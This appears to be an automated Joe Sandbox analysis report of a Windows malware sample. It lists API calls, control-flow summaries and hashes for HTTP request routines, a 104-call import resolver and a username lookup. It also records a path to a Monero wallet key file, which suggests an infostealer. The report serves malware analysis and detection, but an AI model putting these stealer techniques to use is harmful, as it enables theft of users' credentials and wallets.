                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one sentence, `$`-separated, repeated about 30 times in the original listing; benign filler text of this kind is commonly embedded to pad a binary and vary its hashes, and carries no functionality of its own)
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 6485da416469b8c126e0b9db73453eeadbdc1890ac98114e1c74a2e97d25493b
                  • Instruction ID: c1f29e88ae35a8a7e22a5803edf96cc680d758fce7e7372fdda73707c6be3bd1
                  • Opcode Fuzzy Hash: 6485da416469b8c126e0b9db73453eeadbdc1890ac98114e1c74a2e97d25493b
                  • Instruction Fuzzy Hash: D44114606CB688EFE734B7E4AC72D9D7A67EF42F0AF505044BE205A292CFB075454531

                  Control-flow Graph (rendered graph omitted; block structure recovered from the graph data)
                  • 134880-134942: calls 14a7a0, 1347b0 (InternetCrackUrlA), 14a740 ×5, then InternetOpenA and StrCmpCA
                  • 134955-134acd: a long run of string-helper calls (14a920/14a8a0/14a9b0, which wrap lstrcpy/lstrcat per the subcall list, each followed by 14a800), then InternetConnectA; continues to 134ad3 or jumps to the close path at 134ecb
                  • 134aef-134b22: HttpOpenRequestA; continues to 134b28 or jumps to 134ebe (InternetCloseHandle)
                  • 134b28-134e28: the same helpers assemble the request, lstrlen ×2, 14aad0 ×4, then HttpSendRequestA
                  • 134e32-134e5c: InternetReadFile; 134e69-134ea7 (14a9b0/14a8a0/14a800) loops back to it, and 134e67-134eb9 calls InternetCloseHandle once the loop ends
                  • 134ebe-134ec5 and 134ecb-134ef3: InternetCloseHandle ×2, then calls 14aad0 and 139ac0
                  • 134ef5-134f2d (14a820, 14a9b0, 14a8a0, 14a800) and 134f32-134fa2 (148990 ×2, 14a7a0, 14a800 ×8): teardown and return
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                    • Part of subcall function 001347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00134915
                  • StrCmpCA.SHLWAPI(?,0102E470), ref: 0013493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00134ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00150DDB,00000000,?,?,00000000,?,",00000000,?,0102E580), ref: 00134DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00134E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00134E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00134E49
                  • InternetCloseHandle.WININET(00000000), ref: 00134EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00134EC5
                  • HttpOpenRequestA.WININET(00000000,0102E530,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00134B15
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • InternetCloseHandle.WININET(00000000), ref: 00134ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: bad06ee184c0e1e1109be0772072f34b94c1b04f1770de32de997022c854667b
                  • Instruction ID: 1b2f2aba3f54341b9c6077f03b7fd69deb2a2b1ad66df9f5390b09c5745dd32f
                  • Opcode Fuzzy Hash: bad06ee184c0e1e1109be0772072f34b94c1b04f1770de32de997022c854667b
                  • Instruction Fuzzy Hash: EA12F172990119AAEB15EB90DC62FEEB378FF64305F914199B106620A1DF702F49CF62
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001311B7), ref: 00147880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00147887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0014789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 1f2cbb55af4a5cdfa91742c59b2d0e02f2e4476cb324553e0c86f8c76b0986ab
                  • Instruction ID: 74021b5770494b70588dec21e760980f2e89a2f5fc4d6dc56101042a421dc974
                  • Opcode Fuzzy Hash: 1f2cbb55af4a5cdfa91742c59b2d0e02f2e4476cb324553e0c86f8c76b0986ab
                  • Instruction Fuzzy Hash: 53F04FB1944609AFCB14DF98DD4ABAEBBFCEB45711F10025AFA05A2690C77415448BA2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 84b3c75c93d57419d285ec096d741b38ccf0639807eefc44448c32198e5a53a0
                  • Instruction ID: dc551ebacf296e1888098f3113781ceedd188862ca484f7205b7a6de79132d49
                  • Opcode Fuzzy Hash: 84b3c75c93d57419d285ec096d741b38ccf0639807eefc44448c32198e5a53a0
                  • Instruction Fuzzy Hash: 9AD09E7490430CDBCB14DFE0D9496EDBB7CFB48716F101559DD0962340EB3155D6CAA6

                  Control-flow Graph (rendered graph omitted; block structure recovered from the graph data)
                  • 149c10-149c1a: entry check; 149c20-14a031: GetProcAddress ×43 on the first module (75900000 in the APIs below)
                  • 14a036-14a0ca: LoadLibraryA ×8
                  • then one GetProcAddress block per further module, each preceded by a short check block (e.g. 14a146-14a14d) that can skip it: 14a0cc-14a141 (×5), 14a153-14a211 (×8), 14a21f-14a293 (×5), 14a2a5-14a332 (×6), 14a344-14a41a (×9), 14a428-14a49d (×5), 14a4ab-14a4d7 (×2), 14a4e5-14a510 (×2), 14a522-14a60d (×10, the module at 6F060000 whose looked-up names include the WinINet exports InternetSetOptionA and HttpQueryInfoA), 14a61b-14a678 (×4), 14a686-14a699 (×1), 14a6a7-14a703 (×4)
                  • 14a708-14a709: return; 104 GetProcAddress calls in total, matching the APIs list below
                  APIs
                  • GetProcAddress.KERNEL32(75900000,01016740), ref: 00149C2D
                  • GetProcAddress.KERNEL32(75900000,01016A20), ref: 00149C45
                  • GetProcAddress.KERNEL32(75900000,01028F10), ref: 00149C5E
                  • GetProcAddress.KERNEL32(75900000,01028FA0), ref: 00149C76
                  • GetProcAddress.KERNEL32(75900000,0102CA48), ref: 00149C8E
                  • GetProcAddress.KERNEL32(75900000,0102C9E8), ref: 00149CA7
                  • GetProcAddress.KERNEL32(75900000,0101B298), ref: 00149CBF
                  • GetProcAddress.KERNEL32(75900000,0102CA00), ref: 00149CD7
                  • GetProcAddress.KERNEL32(75900000,0102C8B0), ref: 00149CF0
                  • GetProcAddress.KERNEL32(75900000,0102C9A0), ref: 00149D08
                  • GetProcAddress.KERNEL32(75900000,0102C970), ref: 00149D20
                  • GetProcAddress.KERNEL32(75900000,010169A0), ref: 00149D39
                  • GetProcAddress.KERNEL32(75900000,010168C0), ref: 00149D51
                  • GetProcAddress.KERNEL32(75900000,01016680), ref: 00149D69
                  • GetProcAddress.KERNEL32(75900000,010166E0), ref: 00149D82
                  • GetProcAddress.KERNEL32(75900000,0102C8C8), ref: 00149D9A
                  • GetProcAddress.KERNEL32(75900000,0102C7F0), ref: 00149DB2
                  • GetProcAddress.KERNEL32(75900000,0101B0E0), ref: 00149DCB
                  • GetProcAddress.KERNEL32(75900000,01016860), ref: 00149DE3
                  • GetProcAddress.KERNEL32(75900000,0102CA18), ref: 00149DFB
                  • GetProcAddress.KERNEL32(75900000,0102C988), ref: 00149E14
                  • GetProcAddress.KERNEL32(75900000,0102C880), ref: 00149E2C
                  • GetProcAddress.KERNEL32(75900000,0102C8F8), ref: 00149E44
                  • GetProcAddress.KERNEL32(75900000,01016780), ref: 00149E5D
                  • GetProcAddress.KERNEL32(75900000,0102CA60), ref: 00149E75
                  • GetProcAddress.KERNEL32(75900000,0102CAC0), ref: 00149E8D
                  • GetProcAddress.KERNEL32(75900000,0102CA78), ref: 00149EA6
                  • GetProcAddress.KERNEL32(75900000,0102CA90), ref: 00149EBE
                  • GetProcAddress.KERNEL32(75900000,0102CAD8), ref: 00149ED6
                  • GetProcAddress.KERNEL32(75900000,0102C9B8), ref: 00149EEF
                  • GetProcAddress.KERNEL32(75900000,0102CAA8), ref: 00149F07
                  • GetProcAddress.KERNEL32(75900000,0102C958), ref: 00149F1F
                  • GetProcAddress.KERNEL32(75900000,0102C808), ref: 00149F38
                  • GetProcAddress.KERNEL32(75900000,01029978), ref: 00149F50
                  • GetProcAddress.KERNEL32(75900000,0102C9D0), ref: 00149F68
                  • GetProcAddress.KERNEL32(75900000,0102C928), ref: 00149F81
                  • GetProcAddress.KERNEL32(75900000,010168E0), ref: 00149F99
                  • GetProcAddress.KERNEL32(75900000,0102C910), ref: 00149FB1
                  • GetProcAddress.KERNEL32(75900000,01016900), ref: 00149FCA
                  • GetProcAddress.KERNEL32(75900000,0102C8E0), ref: 00149FE2
                  • GetProcAddress.KERNEL32(75900000,0102C868), ref: 00149FFA
                  • GetProcAddress.KERNEL32(75900000,010165E0), ref: 0014A013
                  • GetProcAddress.KERNEL32(75900000,010164C0), ref: 0014A02B
                  • LoadLibraryA.KERNEL32(0102CA30,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A03D
                  • LoadLibraryA.KERNEL32(0102C820,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A04E
                  • LoadLibraryA.KERNEL32(0102C838,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A060
                  • LoadLibraryA.KERNEL32(0102C850,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A072
                  • LoadLibraryA.KERNEL32(0102C898,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A083
                  • LoadLibraryA.KERNEL32(0102C940,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A095
                  • LoadLibraryA.KERNEL32(0102CC28,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A0A7
                  • LoadLibraryA.KERNEL32(0102CBF8,?,00145CA3,00150AEB,?,?,?,?,?,?,?,?,?,?,00150AEA,00150AE3), ref: 0014A0B8
                  • GetProcAddress.KERNEL32(75FD0000,01016600), ref: 0014A0DA
                  • GetProcAddress.KERNEL32(75FD0000,0102CC40), ref: 0014A0F2
                  • GetProcAddress.KERNEL32(75FD0000,01028B60), ref: 0014A10A
                  • GetProcAddress.KERNEL32(75FD0000,0102CDA8), ref: 0014A123
                  • GetProcAddress.KERNEL32(75FD0000,01016380), ref: 0014A13B
                  • GetProcAddress.KERNEL32(73B60000,0101B090), ref: 0014A160
                  • GetProcAddress.KERNEL32(73B60000,01016620), ref: 0014A179
                  • GetProcAddress.KERNEL32(73B60000,0101AE88), ref: 0014A191
                  • GetProcAddress.KERNEL32(73B60000,0102CC70), ref: 0014A1A9
                  • GetProcAddress.KERNEL32(73B60000,0102CD78), ref: 0014A1C2
                  • GetProcAddress.KERNEL32(73B60000,01016520), ref: 0014A1DA
                  • GetProcAddress.KERNEL32(73B60000,010162E0), ref: 0014A1F2
                  • GetProcAddress.KERNEL32(73B60000,0102CDC0), ref: 0014A20B
                  • GetProcAddress.KERNEL32(763B0000,010164E0), ref: 0014A22C
                  • GetProcAddress.KERNEL32(763B0000,01016300), ref: 0014A244
                  • GetProcAddress.KERNEL32(763B0000,0102CC58), ref: 0014A25D
                  • GetProcAddress.KERNEL32(763B0000,0102CD00), ref: 0014A275
                  • GetProcAddress.KERNEL32(763B0000,010165A0), ref: 0014A28D
                  • GetProcAddress.KERNEL32(750F0000,0101B2E8), ref: 0014A2B3
                  • GetProcAddress.KERNEL32(750F0000,0101B1A8), ref: 0014A2CB
                  • GetProcAddress.KERNEL32(750F0000,0102CD48), ref: 0014A2E3
                  • GetProcAddress.KERNEL32(750F0000,010164A0), ref: 0014A2FC
                  • GetProcAddress.KERNEL32(750F0000,010163A0), ref: 0014A314
                  • GetProcAddress.KERNEL32(750F0000,0101B0B8), ref: 0014A32C
                  • GetProcAddress.KERNEL32(75A50000,0102CC88), ref: 0014A352
                  • GetProcAddress.KERNEL32(75A50000,01016500), ref: 0014A36A
                  • GetProcAddress.KERNEL32(75A50000,01028B70), ref: 0014A382
                  • GetProcAddress.KERNEL32(75A50000,0102CB20), ref: 0014A39B
                  • GetProcAddress.KERNEL32(75A50000,0102CBE0), ref: 0014A3B3
                  • GetProcAddress.KERNEL32(75A50000,01016580), ref: 0014A3CB
                  • GetProcAddress.KERNEL32(75A50000,01016320), ref: 0014A3E4
                  • GetProcAddress.KERNEL32(75A50000,0102CB98), ref: 0014A3FC
                  • GetProcAddress.KERNEL32(75A50000,0102CCA0), ref: 0014A414
                  • GetProcAddress.KERNEL32(75070000,01016640), ref: 0014A436
                  • GetProcAddress.KERNEL32(75070000,0102CDD8), ref: 0014A44E
                  • GetProcAddress.KERNEL32(75070000,0102CCB8), ref: 0014A466
                  • GetProcAddress.KERNEL32(75070000,0102CD60), ref: 0014A47F
                  • GetProcAddress.KERNEL32(75070000,0102CCD0), ref: 0014A497
                  • GetProcAddress.KERNEL32(74E50000,01016360), ref: 0014A4B8
                  • GetProcAddress.KERNEL32(74E50000,01016480), ref: 0014A4D1
                  • GetProcAddress.KERNEL32(75320000,010162A0), ref: 0014A4F2
                  • GetProcAddress.KERNEL32(75320000,0102CB38), ref: 0014A50A
                  • GetProcAddress.KERNEL32(6F060000,010163C0), ref: 0014A530
                  • GetProcAddress.KERNEL32(6F060000,010165C0), ref: 0014A548
                  • GetProcAddress.KERNEL32(6F060000,01016660), ref: 0014A560
                  • GetProcAddress.KERNEL32(6F060000,0102CB68), ref: 0014A579
                  • GetProcAddress.KERNEL32(6F060000,01016540), ref: 0014A591
                  • GetProcAddress.KERNEL32(6F060000,01016280), ref: 0014A5A9
                  • GetProcAddress.KERNEL32(6F060000,010162C0), ref: 0014A5C2
                  • GetProcAddress.KERNEL32(6F060000,01016340), ref: 0014A5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0014A5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0014A607
                  • GetProcAddress.KERNEL32(74E00000,0102CAF0), ref: 0014A629
                  • GetProcAddress.KERNEL32(74E00000,01028B80), ref: 0014A641
                  • GetProcAddress.KERNEL32(74E00000,0102CCE8), ref: 0014A659
                  • GetProcAddress.KERNEL32(74E00000,0102CD30), ref: 0014A672
                  • GetProcAddress.KERNEL32(74DF0000,01016560), ref: 0014A693
                  • GetProcAddress.KERNEL32(6F9A0000,0102CD18), ref: 0014A6B4
                  • GetProcAddress.KERNEL32(6F9A0000,010163E0), ref: 0014A6CD
                  • GetProcAddress.KERNEL32(6F9A0000,0102CBB0), ref: 0014A6E5
                  • GetProcAddress.KERNEL32(6F9A0000,0102CD90), ref: 0014A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: 78c6f46f7af1c02bd81f6ae5adfc65c624c5f781c266cba0f6fae1f2f7bb45a3
                  • Instruction ID: 4b4474326265ba3c079bd4485aaf1a841c88b12c63f87528797ed19aa4af50a0
                  • Opcode Fuzzy Hash: 78c6f46f7af1c02bd81f6ae5adfc65c624c5f781c266cba0f6fae1f2f7bb45a3
                  • Instruction Fuzzy Hash: 086249B5504A80AFD36ADFA8ED8995E3BFDE7CC301B14851AA61DC3224D63998C1DF13

                  Control-flow Graph (rendered graph omitted; block structure recovered from the graph data)
                  • 136280-13630b: calls 14a7a0, 1347b0 (InternetCrackUrlA), 14a740, then InternetOpenA and StrCmpCA
                  • 13631e-136342: InternetConnectA; continues to 136348 or jumps to the close path at 1364ff
                  • 136364-136392: HttpOpenRequestA; continues to 136398 or jumps to 1364f5 (InternetCloseHandle)
                  • 13639e-1363bf: InternetSetOptionA, reached from only one side of the check at 136398
                  • 1363c5-136405: HttpSendRequestA then HttpQueryInfoA; continues either to 136407 (14a740, 14a800 ×2, exit) or to 13642c (call 148940)
                  • 136456-136480: InternetReadFile; 13648d-1364c5 (14a9b0/14a8a0/14a800) loops back to it
                  • 1364c7-1364ef, 1364f5-1364f9, 1364ff-136503: InternetCloseHandle ×3; 136509-136525: 14a7a0, 14a800 ×2; 136528-13652d: return
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                    • Part of subcall function 001347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • InternetOpenA.WININET(00150DFE,00000001,00000000,00000000,00000000), ref: 001362E1
                  • StrCmpCA.SHLWAPI(?,0102E470), ref: 00136303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00136335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00136385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001363BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001363D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001363FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0013646D
                  • InternetCloseHandle.WININET(00000000), ref: 001364EF
                  • InternetCloseHandle.WININET(00000000), ref: 001364F9
                  • InternetCloseHandle.WININET(00000000), ref: 00136503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
